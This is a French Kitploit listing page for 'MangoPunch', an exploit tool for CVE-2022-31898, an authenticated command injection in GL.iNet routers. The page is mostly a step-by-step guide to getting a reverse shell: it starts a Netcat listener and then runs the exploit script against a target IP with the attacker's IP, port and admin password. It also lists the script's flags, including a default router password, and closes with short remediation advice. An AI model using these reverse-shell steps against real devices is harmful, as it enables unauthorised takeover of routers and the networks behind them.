Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MangoPunch-CVE-2022-31898 — Outil d'injection de commandes authentifié (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
Outils/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

Outil d'injection de commandes authentifié (CVE-2022-31898) - HACKCONRD 2026.

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🥭 MangoPunch: CVE-2022-31898

Injection de commandes OS authentifiée pour les appareils GL.iNet

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 Aperçu de la vulnérabilité

Ce dépôt contient une preuve de concept (PoC) technique pour une vulnérabilité d'exécution de commandes à distance (RCE) trouvée dans le GL.iNet MT300N-V2 (Mango) et d'autres modèles exécutant des versions de firmware inférieures à 3.215.

Le défaut existe dans le paramètre ping_addr de l'API de diagnostic, permettant à un attaquant authentifié d'exécuter des commandes système arbitraires via des métacaractères shell (;).


🚀 Guide d'exécution

1. Préparez votre listener

Ouvrez un terminal sur votre machine d'attaque (Kali Linux) et démarrez un listener Netcat :

root@kitploit:~
nc -lvnp 9292

2. Exécutez l'exploit

Utilisez la commande suivante pour déclencher le reverse shell :

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ Paramètres du script

FlagNom completDescriptionDéfaut
-R--rhostIP cible distante (routeur)Required
-P--rportPort de gestion Web443
-L--lhostIP du listener (Kali/attaquant)Required
-l--lportPort du listenerRequired
-p--pwdMot de passe administrateurgoodlife
-t--httpsActiver HTTPSFalse

🛡️ Remédiation

  • Mettez à jour le firmware : Assurez-vous que votre appareil exécute la version 3.215 ou une version supérieure.
  • Validation des entrées : Les développeurs devraient implémenter une validation Regex stricte pour les paramètres IP/Hostname et éviter les fonctions invoquant le shell qui transmettent des chaînes brutes au système d'exploitation.

Avertissement : Cet outil est uniquement destiné à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive.

Télécharger l’outil